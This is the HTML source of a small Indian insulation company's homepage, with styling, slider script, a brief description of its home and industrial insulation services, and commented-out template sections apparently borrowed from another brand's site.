
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="UTF-8" />
<meta content="width=device-width, initial-scale=1.0" name="viewport">
<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />
<!-- This site is optimized with the Yoast SEO plugin v16.2 - https://yoast.com/wordpress/plugins/seo/ -->
<title>ALL TEMPRETUR SOLUTIONS</title>
<meta name="description" content="ALL TEMPRETUR SOLUTIONS" />
<link rel="canonical" href="https://tempsol.in/" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="website" />
<meta property="og:title" content="all tempretur solutions" />
<meta property="og:description" content="all tempretur solutions" />
<meta property="og:url" content="https://tempsol.in/" />
<meta property="og:site_name" content="all tempretur solutions" />
<meta property="article:modified_time" content="2021-12-13T08:59:17+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:label1" content="Est. reading time">
<meta name="twitter:data1" content="2 minutes">


<link rel="stylesheet" type="text/css" href="css/hjxh.css" media="all"/>
<style id='rs-plugin-settings-inline-css' type='text/css'>
#rs-demo-id {}
</style>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<link rel="stylesheet" type="text/css" href="css/hnu6.css" media="all"/>
<script src='js/hjxh.js' type="text/javascript"></script>


<link rel="icon" href="#" sizes="32x32" />

<script type="text/javascript">function setREVStartSize(e){

window.RSIW = window.RSIW===undefined ? window.innerWidth : window.RSIW;	
window.RSIH = window.RSIH===undefined ? window.innerHeight : window.RSIH;	
try {								
var pw = document.getElementById(e.c).parentNode.offsetWidth,
newh;
pw = pw===0 || isNaN(pw) ? window.RSIW : pw;
e.tabw = e.tabw===undefined ? 0 : parseInt(e.tabw);
e.thumbw = e.thumbw===undefined ? 0 : parseInt(e.thumbw);
e.tabh = e.tabh===undefined ? 0 : parseInt(e.tabh);
e.thumbh = e.thumbh===undefined ? 0 : parseInt(e.thumbh);
e.tabhide = e.tabhide===undefined ? 0 : parseInt(e.tabhide);
e.thumbhide = e.thumbhide===undefined ? 0 : parseInt(e.thumbhide);
e.mh = e.mh===undefined || e.mh=="" || e.mh==="auto" ? 0 : parseInt(e.mh,0);		
if(e.layout==="fullscreen" || e.l==="fullscreen") 						
newh = Math.max(e.mh,window.RSIH);					
else{					
e.gw = Array.isArray(e.gw) ? e.gw : [e.gw];
for (var i in e.rl) if (e.gw[i]===undefined || e.gw[i]===0) e.gw[i] = e.gw[i-1];					
e.gh = e.el===undefined || e.el==="" || (Array.isArray(e.el) && e.el.length==0)? e.gh : e.el;
e.gh = Array.isArray(e.gh) ? e.gh : [e.gh];
for (var i in e.rl) if (e.gh[i]===undefined || e.gh[i]===0) e.gh[i] = e.gh[i-1];
var nl = new Array(e.rl.length),
ix = 0,						
sl;					
e.tabw = e.tabhide>=pw ? 0 : e.tabw;
e.thumbw = e.thumbhide>=pw ? 0 : e.thumbw;
e.tabh = e.tabhide>=pw ? 0 : e.tabh;
e.thumbh = e.thumbhide>=pw ? 0 : e.thumbh;					
for (var i in e.rl) nl[i] = e.rl[i]<window.RSIW ? 0 : e.rl[i];
sl = nl[0];									
for (var i in nl) if (sl>nl[i] && nl[i]>0) { sl = nl[i]; ix=i;}															
var m = pw>(e.gw[ix]+e.tabw+e.thumbw) ? 1 : (pw-(e.tabw+e.thumbw)) / (e.gw[ix]);					
newh =  (e.gh[ix] * m) + (e.tabh + e.thumbh);
}				
if(window.rs_init_css===undefined) window.rs_init_css = document.head.appendChild(document.createElement("style"));					
document.getElementById(e.c).height = newh+"px";
window.rs_init_css.innerHTML += "#"+e.c+"_wrapper { height: "+newh+"px }";				
} catch(e){
console.log("Failure at Presize of Slider:" + e)
}					   
//});
};</script>
<link href="http://fonts.googleapis.com/css?family=Lato:100,300,400,700,900%7CRoboto+Slab:100,300,400,700&amp;subset=latin,latin" rel="stylesheet" type="text/css">		<style type="text/css" id="wp-custom-css">
.nav-tabs>li.active>a, .nav-tabs>li.active>a:focus, .nav-tabs>li.active>a:hover{color: #fff; background-color: #7c7c7c; border: 1px solid #7c7c7c; border-bottom-color: transparent;cursor: default;}
.nav-tabs > li > a{border-radius:none !important;border-top-left-radius:0px !important;border-top-right-radius:0px !important;color:#7c7c7c !important}
.nav-tabs>li.active>a{color:#fff !important;}
.yembed {
position: relative;
padding-top: 56.25% !important;
width:100% !important;
}
.yembed iframe,
.yembed object,
.yembed embed {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
}
#respond{display:none;}
.navbar-brand img{width:200px !important; height:auto !important;}
.menu .nav>li>a{padding-left:18px !important; padding-right:18px !important;}
.cl-btn.amezon-btn {
width: 40%;
margin-left: 5%;
float: right;
}
.amazon-img {
width: 11%;
margin-left: 15px;
}
.amazon-size {
line-height: normal;
width: 50%;
display: inline-block;
margin-bottom: 10px;
height: 50px;
vertical-align: middle;
padding-top: 15px;
}
.amazon-products .table-responsive {
margin-top: 0rem;
}
.amazon-products .col-md-6 img {
border: 1px solid #ddd;
}
.amazon-products .table-responsive h5{
padding-left: 0px;
}		</style>
<style type="text/css" media="screen">.cust-pdf-btn .panel-primary > .panel-heading + .panel-collapse .panel-body {
border-top-color: #7c7c7c;
background: transparent;
}
.cust-pdf-btn .panel-primary .panel-heading a, 
.cust-pdf-btn .panel-primary .panel-heading .panel-title {
color: #fff;
text-decoration: none;
background: #7c7c7c !important;
}
.cust-pdf-btn .panel-primary .panel-heading {
background: #7C7C7C;
}
.cust-pdf-btn a {
width: 100%;
text-align: left;
border-radius: 0;
margin-bottom: 0px !important;
}
.dropdown a.dropdown-toggle:after {
font-family: FontAwesome;
content: "\f107";
padding-left: 4px;
}
.cust-blog .vc_general {
color: #fff !important;
font-size: 16px;
font-weight: 600;
text-transform: uppercase;
padding-top: 0;
padding-bottom: 0;
height: 50px;
line-height: 50px;
background-color: rgb(230,0,0) !important;
border-color: rgb(230,0,0);
border-radius: 0;
padding-left: 27px;
padding-right: 27px;
}
#submit{
color: #fff !important;
font-size: 16px;
font-weight: 600;
text-transform: uppercase;
padding-top: 0;
padding-bottom: 0;
height: 50px;
line-height: 50px;
background-color: rgb(230,0,0) !important;
border-color: rgb(230,0,0);
border-radius: 0;
padding-left: 27px;
padding-right: 27px;
}
.wpcf7-response-output {
padding: 5px 20px;
color: #f0f00a;
}
.wpcf7-not-valid-tip {
color: #f0f00a;
}
.product-head {
position: absolute;
bottom: -12px;
text-align: center;
left: 0;
right: 0;
background: #7c7c7c;
padding: 5px;
color: #fff;
width: 100%;
}
#text-5 .sidebar-header {
padding-left: 15px;
}
::-webkit-input-placeholder { /* Chrome/Opera/Safari */
color: #FFF;
}
::-moz-placeholder { /* Firefox 19+ */
color: #FFF;
}
:-ms-input-placeholder { /* IE 10+ */
color: #FFF;
}
:-moz-placeholder { /* Firefox 18- */
color: #FFF;
}
#footer input.wpcf7-form-control.wpcf7-submit {
color: #e60000;
font-size: 16px;
font-weight: 600;
text-transform: uppercase;
padding-top: 0;
padding-bottom: 0;
height: 35px;
line-height: 35px;
background-color: rgb(255, 255, 255);
border-color: rgb(255, 255, 255);
border-radius: 0px;
padding-left: 27px;
padding-right: 27px;
}
#footer .wpcf7-form-control.wpcf7-text.wpcf7-validates-as-required.form-control {
border: 1px solid #FFF;
padding: 5px;
line-height: normal;
height: 30px !important;
color: #FFF;
}
#footer .wpcf7-form-control.wpcf7-textarea.wpcf7-validates-as-required.form-control{
border: 1px solid #FFF;
padding: 5px;
line-height: normal;
height: 125px !important;
color: #FFF;
}
footer ul {
list-style: none;
color: #fff;
font-size: 16px;
}
.go-top i {
color: #e60000 !important;
}
.subfooter .footer-columns-1 {
border-top: 1px solid #FFF;
margin: 0 5px;
}
footer ul li img {
margin-right: 10px;
}
.navbar-brand img {
width: 148px;
}
.cust-title-70 {
font-size: 70px;
font-weight: 800;
color: #000;
line-height: normal;
}
.cust-title-70 em {
color: #7c7c7c;
font-style: normal;
}
.cust-btn {
background: red !important;
border-radius: unset;
font-size: 24px;
padding: 4px 50px;
}
.glance-heading {
font-size: 60px;
font-weight: 700 !important;
line-height: 68px;
text-transform: uppercase;
}
.product-cat-list .figure, .product-cat-list .figure img {
width: 100%;
}
.cat-image {
color: #fff;
}
.product-cat-list .figure, .product-cat-list .figure img {
width: 100%;
}
.product-cat-title {
position: absolute;
top: 0;
left: 0;
right: 0;
bottom: 0;
content: '';
opacity: 0;
color: #fff;
width: 100%;
cursor: pointer;
font-size: 20px;
line-height: 1.2;
text-align: center;
margin: auto !important;
background-color: rgba(230, 0, 0, 0.57);
}
.product-cat-title a {
position: absolute;
left: 0;
right: 0;
top: 0;
bottom: 0;
margin: auto;
height: 100px;
}
.cat-image {
color: #fff;
}
.product-cat-list:hover .product-cat-title,
.product-cat-list:focus .product-cat-title{
opacity: 1;
}
.product-cat-list:hover .product-cat-title a,
.product-cat-list:focus .product-cat-title a{
color: #fff;
}
.product-cat-list,
.product-cat-title{
-webkit-transition: all 0.3s;
-moz-transition: all 0.3s;
-ms-transition: all 0.3s;
-o-transition: all 0.3s;
}
.catinfo {
font-size: 62px;
background: transparent;
color: #FFF;
text-transform: uppercase;
}
.product-cat-list{
position: relative;
padding: 0;
}
.wpcf7-form label {
font-size: 14px;
padding-top: 13px;
}
.wpcf7-form .form-group {
display: inline-block;
width: 100%;
}
.wpcf7-form .form-control {
border-radius: 0px !important;
height: 50px !important;
font-size: 14px;
line-height: normal;
}
.wpcf7-form .wpcf7-textarea {
height: auto !important;
}
.address-sec ul {
list-style: none;
padding-left: 0;
}
.address-sec ul li {
margin-top: 10px;
}
address-sec ul li .fa {
margin-right: 15px;
}
input.wpcf7-form-control.wpcf7-submit {
color: #fff;
font-size: 16px;
font-weight: 600;
text-transform: uppercase;
padding-top: 0;
padding-bottom: 0;
height: 50px;
line-height: 50px;
background-color: rgb(230, 0, 0);
border-color: rgb(230, 0, 0);
border-radius: 0px;
padding-left: 27px;
padding-right: 27px;
}
.address-sec ul{
padding-left: 0;
}
.address-sec ul li{
position: relative;
padding-left: 35px;
}
.address-sec ul li::after{
position: absolute;
top: 0;
left: 0;
width: 25px;
color: #5c5c5c;
font-size: 24px;
line-height: 1.3;
text-align: center;
font-family: 'FontAwesome';
}
.address-sec ul li:first-child:after{
content: '\f041';
}
.address-sec ul li:last-child:after{
content: '\f0e0';
}
#footer ul{
padding-left: 0;
}
.footerbar{
color: rgba(255, 255, 255,0.8) !important;
}
#footer .menu li{
padding-bottom: 0;
border-bottom: 0;
}
#footer .col-sm-3{
padding-top: 10px;
}
#footer .col-sm-3:first-child{
padding-top: 0;
}
#featuresection .owl-theme .owl-nav{
display: none !important;
}
#unitsection .col-md-4 {
margin-bottom: 40px;
}
#media_image-2 img {
width: 200px;
height: auto;
}
@media only screen and (min-width: 1920px){
.award-des{
width: 750px;
}
}
@media only screen and (min-width: 992px){
.awarad-slider{
padding-left: 0;
padding-right: 0;
}
.award-space{
padding-left: 100px;
}
.product-cat-list{
margin: 0 15px 25px;
width: 48%;
}
#footer .col-sm-3:nth-child(2) .menu{
padding-left: 50px;
}
.owl-carousel .owl-item .item-img img{
height: 550px;
object-fit: contain;
}
}
@media only screen and (max-width: 1800px){
.product-cat-list{
margin: 0 15px 25px 0;
}
}
@media only screen and (max-width: 1440px){
.cust-title-70{
font-size: 54px;
}
.glance-heading{
font-size: 50px;
}
.cust-btn{
font-size: 20px;
}
.catinfo{
font-size: 46px;
}
.product-cat-title a{
height: 60px;
}
}
@media only screen and (max-width: 991px){
.product-cat-list{
margin-right: 0;
}
.award-sec{
text-align: center;
padding: 20px 30px;
}
.glance-heading{
font-size: 40px;
text-align: center !important;
margin-bottom: 0 !important;
line-height: 1;
}
.logo-navbar .nav > li > a {
line-height: 1;
}
#media_image-2 img {
width: 200px;
height: auto;
}
}
@media only screen and (max-width: 767px){
.glance-heading{
font-size: 26px;
}
.cust-btn,
.award-des,
.spitze-des{
font-size: 16px;
}
.cust-title-70{
font-size: 34px;
}
.catinfo{
font-size: 36px;
}
.product-cat-title a{
height: 70px;
line-height: 1;
}
}</style><script type="text/javascript">/*jQuery( document ).ready(function() {
jQuery('#footer .col-sm-4:first').addClass('col-md-2');   
jQuery('#footer .col-md-2').removeClass('col-sm-4');   
jQuery('#footer .col-sm-4:nth-child(2)').addClass('col-md-5');   
jQuery('#footer .col-md-5:first').removeClass('col-sm-4');   
jQuery('#footer .col-sm-4:last').addClass('col-md-5');   
jQuery('#footer .col-md-5:nth-child(2)').removeClass('col-sm-4');   
});*/</script><noscript><style> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><!-- Global site tag (gtag.js) - Google Analytics -->

<link rel="stylesheet" type="text/css" href="css/hjxh1.css" media="all"/>
</head>
<body data-rsssl=1 class="home page-template-default page page-id-15 wpb-js-composer js-comp-ver-6.2.0 vc_responsive">
<div class="pace-overlay"></div>
<div id="masthead" class="menu navbar navbar-static-top header-logo-left-menu-right oxy-mega-menu navbar-sticky navbar-not-mobile-stuck text-none" role="banner">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target=".main-navbar">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href="coming.html" class="navbar-brand">
<img src="fimg/3.png" alt="Spitze by Everyday">
</a>
</div>
<div class="nav-container">
<nav class="collapse navbar-collapse main-navbar logo-navbar navbar-right" role="navigation">
<div class="menu-container"><ul id="menu-header-menu" class="nav navbar-nav"><li id="menu-item-19" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-15 current_page_item menu-item-19 active active"><a href="#/">Home</a></li>
<li id="menu-item-573" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-573"><a href="coming.html">Home Insulation</a></li>


<li id="menu-item-2258" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2258"><a href="coming.html">Industrial Insulation</a></li>

<li id="menu-item-2258" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2258"><a href="coming.html">Product</a></li>


<!--
<li id="menu-item-2416" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-2416 dropdown"><a href="coming.html" data-toggle="dropdown" class="dropdown-toggle">Product</a><ul role="menu" class="dropdown-menu dropdown-menu-left">
  
  
  
  
  	<li id="menu-item-356" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-356"><a href="https://spitzebyeveryday.com/about/">Company Profile</a></li>
<li id="menu-item-1065" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1065"><a href="https://spitzebyeveryday.com/infrastructure/">Infrastructure</a></li>
<li id="menu-item-1676" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1676"><a href="https://spitzebyeveryday.com/blog/">Blog</a></li>
<li id="menu-item-360" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-360"><a href="https://spitzebyeveryday.com/contact-us/">Contact Us</a></li>
</ul>
</li>
<li id="menu-item-1563" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1563"><a href="https://spitzebyeveryday.com/awards/">Awards</a></li>
<li id="menu-item-2260" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2260"><a href="https://spitzebyeveryday.com/investor-relations/">Investor Relations</a></li>
<li id="menu-item-359" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-359"><a href="https://spitzebyeveryday.com/download/">Download</a></li>
<li id="menu-item-1690" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1690"><a target="_blank" href="https://www.everyday-india.com/">Economy Products</a></li>

-->

</ul></div><div class="menu-sidebar">
</div>
</nav>
</div>
</div>
</div>
<div id="content" role="main"><article id="post-15" class="post-15 page type-page status-publish hentry">
<section class="section  text-normal section-text-no-shadow section-inner-no-shadow section-normal section-opaque"  >
<div class="background-overlay grid-overlay-0 " style="background-color: rgba(0,0,0,0);"></div>
<div class="container-fullwidth container-vertical-default">
<div class="row vertical-default">
<div class="col-md-12     text-default small-screen-default"  >
<!-- START Home Slider REVOLUTION SLIDER 6.2.6 --><p class="rs-p-wp-fix"></p>
<rs-module-wrap id="rev_slider_1_1_wrapper" data-source="gallery" style="background:transparent;padding:0;margin:0px auto;margin-top:0;margin-bottom:0;">
<rs-module id="rev_slider_1_1" style="" data-version="6.2.6">
<rs-slides>
<rs-slide data-key="rs-1" data-title="Slide" data-anim="ei:d;eo:d;s:1000;r:0;t:fade;sl:0;">
<img src="fimg/1.jpg" title="Home-slider-1" width="1920" height="1081" class="rev-slidebg" data-no-retina>
<!---->						</rs-slide>
</rs-slides>
<rs-progress class="rs-bottom" style="visibility: hidden !important;"></rs-progress>
</rs-module>
<script type="text/javascript">
setREVStartSize({c: 'rev_slider_1_1',rl:[1240,1240,778,480],el:[814,814,960,720],gw:[1920,1920,778,480],gh:[814,814,500,500],type:'standard',justify:'',layout:'fullwidth',mh:"0"});
var	revapi1,
tpj;
jQuery(function() {
tpj = jQuery;
revapi1 = tpj("#rev_slider_1_1")
if(revapi1==undefined || revapi1.revolution == undefined){
revslider_showDoubleJqueryError("rev_slider_1_1");
}else{
revapi1.revolution({
sliderLayout:"fullwidth",
visibilityLevels:"1240,1240,778,480",
gridwidth:"1920,1920,778,480",
gridheight:"814,814,500,500",
spinner:"spinner0",
perspective:600,
perspectiveType:"global",
editorheight:"814,768,960,720",
responsiveLevels:"1240,1240,778,480",
disableProgressBar:"on",
navigation: {
onHoverStop:false
},
fallbacks: {
allowHTML5AutoPlayOnAndroid:true
},
});
}
});
</script>
</rs-module-wrap>
<!-- END REVOLUTION SLIDER -->
</div>        </div>
</div>
</section>
<section class="section  text-normal section-text-no-shadow section-inner-no-shadow section-normal section-opaque"  >
<div class="background-overlay grid-overlay-0 " style="background-color: rgba(0,0,0,0);"></div>
<div class="container-fullwidth container-vertical-default">
<div class="row vertical-default">
<div class="col-md-12     text-center small-screen-default"  ><div class="figure element-top-0 element-bottom-0  " data-os-animation="none" data-os-animation-delay="0s">
<a href="coming.html" class="figure-image " target="_blank">
<img width="1800" height="900" src="fimg/2.png" class="attachment-full size-full" alt="" loading="lazy"/>            </a>
</div>
</div>        </div>
</div>
</section>
<section class="section  text-normal section-text-no-shadow section-inner-no-shadow section-normal section-opaque"  >
<div class="background-overlay grid-overlay-0 " style="background-color: rgba(240,240,240,1);"></div>
<div class="container container-vertical-default">
<div class="row vertical-default">
<div class="col-md-12     text-center small-screen-default"  ><div class="divider-wrapper " style="visibility:hidden;background-color:#FFFFFF">
<div class="visible-xs" style="height:20px;"></div>
<div class="visible-sm" style="height:20px;"></div>
<div class="visible-md" style="height:70px;"></div>
<div class="visible-lg" style="height:70px;"></div>
</div><h2 style="text-align: center" class="vc_custom_heading cust-title-70" >About <em>Tempsol</em></h2><div class="col-text-1 text-normal spitze-des element-top-20 element-bottom-20" data-os-animation="none" data-os-animation-delay="0s">
<p>About TEMPSOL
Bringing comfort to you homes and workplace
<br>
<br>
We provide our insulation services for diverse sectors like Steel building , Metal Roof , Asbestos roof sheet , Under deck , Concrete roof , Cold storage / Room , Refrigerator containers , poultry farm , Reflective insulation , Pre - Engineered Buildings insulation , Thermal Insulation , Live stock Insulation , Building insulation . Warehouses , Manufacturing Industries , Commercial , Domestics , Apartments , Malls , Fitness Training Centers , etc. 
<br>
<br>
Our services include roof thermal insulation , complete building insulation , ceiling insulation , floor insulation , etc. 
<br>
<br>
We have a team of insulation constructors that analyze your building inside - out and recommend the best thermal insulation solution that will provide high resistance to your building and will sustain all weather changes to keep your interior environment unchanged .
<br>
<br>
Our team specializes in affordable affordable installation solution.With over 14 years of experience, a professional staff and the latest technology.
<br>
<br>
 we are here to help you with all your needs.
<br>
<br>
Discover More About Our temperature Solutions Expertise!.</p>
</div>
<div class="divider-wrapper " style="visibility:hidden;background-color:#FFFFFF">
<div class="visible-xs" style="height:50px;"></div>
<div class="visible-sm" style="height:50px;"></div>
<div class="visible-md" style="height:100px;"></div>
<div class="visible-lg" style="height:100px;"></div>
</div></div>        </div>
</div>
</section>
<section class="section  text-normal section-text-no-shadow section-inner-no-shadow section-normal section-opaque"  >
<div class="background-overlay grid-overlay-0 " style="background-color: rgba(0,0,0,0);"></div>
<div class="container-fullwidth container-vertical-default">
<div class="row vertical-default">
<div class="col-md-1     text-default small-screen-default"  ></div><div class="col-md-10     text-default small-screen-default"  ><div class="divider-wrapper " style="visibility:hidden;background-color:#FFFFFF">
<div class="visible-xs" style="height:40px;"></div>
<div class="visible-sm" style="height:40px;"></div>
<div class="visible-md" style="height:70px;"></div>
<div class="visible-lg" style="height:70px;"></div>
</div><h2 style="text-align: center" class="vc_custom_heading cust-title-70" >Types Of <em> Insulation</em></h2><div class="divider-wrapper " style="visibility:hidden;background-color:#FFFFFF">
<div class="visible-xs" style="height:30px;"></div>
<div class="visible-sm" style="height:30px;"></div>
<div class="visible-md" style="height:60px;"></div>
<div class="visible-lg" style="height:60px;"></div>
</div><div class="col-text-1 text-normal  element-top-20 element-bottom-20" data-os-animation="none" data-os-animation-delay="0s">
<div class="col-md-6 product-cat-list text-default small-screen-default">
<div class="figure element-top-0 element-bottom-0">
<a href="coming.html" class="figure-image cat-image" >
<img class="scale-with-grid" src="fimg/4.jpg" alt="Home Insulation" title="Client Name">
</a>
</div>
<div class="col-text-1 text-normal product-cat-title element-top-0 element-bottom-0">
<p> <a href="coming.html" class="catinfo" > Home Insulation </a>  </p>
</div>
</div>
<div class="col-md-6 product-cat-list text-default small-screen-default">
<div class="figure element-top-0 element-bottom-0">
<a href="coming.html" class="figure-image cat-image" >
<img class="scale-with-grid" src="fimg/5.jpg" alt="Industrial Insulation" title="Client Name">
</a>
</div>
<div class="col-text-1 text-normal product-cat-title element-top-0 element-bottom-0">
<p> <a href="coming.html" class="catinfo" > Industrial Insulation </a>  </p>
</div>
</div>
<div class="col-md-6 product-cat-list text-default small-screen-default">
<div class="figure element-top-0 element-bottom-0">
<a href="coming.html" class="figure-image cat-image" >
<img class="scale-with-grid" src="fimg/6.jpg" alt="Commercial Insulation" title="Client Name">
</a>
</div>
<div class="col-text-1 text-normal product-cat-title element-top-0 element-bottom-0">
<p> <a href="coming.html" class="catinfo" > Commercial Insulation </a>  </p>
</div>
</div>
<div class="col-md-6 product-cat-list text-default small-screen-default">
<div class="figure element-top-0 element-bottom-0">
<a href="coming.html" class="figure-image cat-image" >
<img class="scale-with-grid" src="fimg/7.jpg" alt="Inserts" title="Client Name">
</a>
</div>
<div class="col-text-1 text-normal product-cat-title element-top-0 element-bottom-0">
<p> <a href="coming.html" class="catinfo" > Product s </a>  </p>
</div>
</div>

<!--
<section class="section  text-normal section-text-no-shadow section-inner-no-shadow section-normal section-opaque"  >
<div class="background-overlay grid-overlay-0 " style="background-color: rgba(255,255,255,0);"></div>
<div class="container container-vertical-default">
<div class="row vertical-default">
<div class="col-md-12     text-center small-screen-default"  ><h2 style="text-align: center" class="vc_custom_heading cust-title-70" >Spitze at a <em>Glance</em></h2><div class="divider-wrapper " style="visibility:hidden;background-color:#FFFFFF">
<div class="visible-xs" style="height:30px;"></div>
<div class="visible-sm" style="height:30px;"></div>
<div class="visible-md" style="height:30px;"></div>
<div class="visible-lg" style="height:30px;"></div>
</div></div>        </div>
</div>
</section>
<section class="section  text-normal section-text-no-shadow section-inner-no-shadow section-normal section-opaque"  >
<div class="background-overlay grid-overlay-0 " style="background-color: rgba(240,240,240,1);"></div>
<div class="container-fullwidth container-vertical-middle">
<div class="row vertical-middle">
<div class="col-md-1     text-default small-screen-default"  ></div><div class="col-md-5    award-sec text-default small-screen-default"  ><h2 class="text-left glance-heading element-top-20 element-bottom-20 text-normal normal regular" data-os-animation="none" data-os-animation-delay="0s" >
Awards and Recognition</h2><div class="col-text-1 text-normal award-des element-top-20 element-bottom-20" data-os-animation="none" data-os-animation-delay="0s">
<p>We are globally recognised brand in quality, design and performance. Please view few important awards and recognition of ours.</p>
</div>
<a href="https://spitzebyeveryday.com/awards/" class="btn btn-default   text-normal  cust-btn element-left-0 element-right-0 element-top-20 element-bottom-20" target="_self"   data-os-animation="none" data-os-animation-delay="0s">
READ MORE     </a></div><div class="col-md-6    awarad-slider text-default small-screen-default"  style="background:#ffffff;"><div class="figure element-top-20 element-bottom-20   hidden-lg hidden-md hidden-sm hidden-xs" data-os-animation="none" data-os-animation-delay="0s">
<span class="figure-image">
<img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2020/09/SpitzeAwards.png" class="attachment-full size-full" alt="" loading="lazy" srcset="https://spitzebyeveryday.com/wp-content/uploads/2020/09/SpitzeAwards.png 1000w, https://spitzebyeveryday.com/wp-content/uploads/2020/09/SpitzeAwards-300x180.png 300w, https://spitzebyeveryday.com/wp-content/uploads/2020/09/SpitzeAwards-768x461.png 768w" sizes="(max-width: 1000px) 100vw, 1000px" />            </span>
</div>
<div class="col-text-1 text-normal  element-top-0 element-bottom-0" data-os-animation="none" data-os-animation-delay="0s">
<div class="carousel-slider-outer carousel-slider-outer-images carousel-slider-outer-2110">
<style type="text/css">
#id-2110 .carousel-slider-nav-icon {
fill: #f1f1f1
}
#id-2110 .carousel-slider-nav-icon:hover {
fill: #00d1b2
}
#id-2110 .owl-prev,
#id-2110 .owl-next,
#id-2110 .carousel-slider-nav-icon {
height: 48px;
width: 48px
}
#id-2110.arrows-outside .owl-prev {
left: -48px
}
#id-2110.arrows-outside .owl-next {
right: -48px
}
#id-2110 .owl-dots .owl-dot span {
background-color: #f1f1f1;
width: 10px;
height: 10px;
}
#id-2110 .owl-dots .owl-dot.active span,
#id-2110 .owl-dots .owl-dot:hover span {
background-color: #00d1b2
}
</style>	<div id="id-2110" class="owl-carousel carousel-slider arrows-inside arrows-visible-hover dots-hidden dots-center dots-square" data-slide-type="image-carousel" data-margin="10" data-slide-by="1" data-loop="true" data-lazy-load="false" data-stage-padding="0" data-auto-width="false" data-dots="false" data-nav="true" data-autoplay="true" data-autoplay-timeout="5000" data-autoplay-speed="500" data-autoplay-hover-pause="false" data-colums="1" data-colums-desktop="1" data-colums-small-desktop="1" data-colums-tablet="1" data-colums-small-tablet="1" data-colums-mobile="1">
<div class="carousel-slider__item">
  <img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2020/09/SpitzeAwards.png" class="attachment-full size-full" alt="" loading="lazy" />
  </div>
  <div class="carousel-slider__item">
    <img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2021/09/awards-idn.png" class="attachment-full size-full" alt="" loading="lazy" />
  </div>
  <div class="carousel-slider__item">
    <img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2021/09/awards-pb.png" class="attachment-full size-full" alt="" loading="lazy" />
    </div>
    <div class="carousel-slider__item">
      <img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2021/09/awards-pb1.png" class="attachment-full size-full" alt="" loading="lazy" />
      </div>
      <div class="carousel-slider__item">
        <img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2021/09/awards-pb2.png" class="attachment-full size-full" alt="" loading="lazy" />
        </div>
        <div class="carousel-slider__item">
          <img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2021/09/awards-pb3.png" class="attachment-full size-full" alt="" loading="lazy" />
          </div>
          <div class="carousel-slider__item">
            <img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2021/09/awards.png" class="attachment-full size-full" alt="" loading="lazy" />
            </div>
            <div class="carousel-slider__item">
              <img width="1000" height="600" src="https://spitzebyeveryday.com/wp-content/uploads/2021/09/awards-powerbreand.png" class="attachment-full size-full" alt="" loading="lazy" /></div>	</div>
</div>
</div>
</div>        </div>
</div>
</section>
<section class="section  hidden-lg hidden-md hidden-sm hidden-xs text-normal section-text-no-shadow section-inner-no-shadow section-normal section-opaque"  >
<div class="background-overlay grid-overlay-0 " style="background-color: rgba(240,240,240,1);"></div>
<div class="container-fullwidth container-vertical-middle">
<div class="row vertical-middle">
<div class="col-md-1     text-default small-screen-default"  ></div><div class="col-md-5    award-sec text-default small-screen-default"  ><h2 class="text-left glance-heading element-top-20 element-bottom-20 text-normal normal regular" data-os-animation="none" data-os-animation-delay="0s" >
AWARDS</h2><div class="col-text-1 text-normal award-des element-top-20 element-bottom-20" data-os-animation="none" data-os-animation-delay="0s">
<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh dolore magna aliquam erat volutpat. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam</p>
</div>

<a href="coming.html" class="btn btn-default   text-normal  cust-btn element-left-0 element-right-0 element-top-20 element-bottom-20" target="_self"   data-os-animation="none" data-os-animation-delay="0s">
READ MORE     </a></div><div class="col-md-6    awarad-slider text-default small-screen-default"  ><div class="col-text-1 text-normal  element-top-0 element-bottom-0" data-os-animation="none" data-os-animation-delay="0s">
<div class="carousel-slider-outer carousel-slider-outer-images carousel-slider-outer-53">
<style type="text/css">
#id-53 .carousel-slider-nav-icon {
fill: #f1f1f1
}
#id-53 .carousel-slider-nav-icon:hover {
fill: #00d1b2
}
#id-53 .owl-prev,
#id-53 .owl-next,
#id-53 .carousel-slider-nav-icon {
height: 48px;
width: 48px
}
#id-53.arrows-outside .owl-prev {
left: -48px
}
#id-53.arrows-outside .owl-next {
right: -48px
}
#id-53 .owl-dots .owl-dot span {
background-color: #f1f1f1;
width: 10px;
height: 10px;
}
#id-53 .owl-dots .owl-dot.active span,
#id-53 .owl-dots .owl-dot:hover span {
background-color: #00d1b2
}
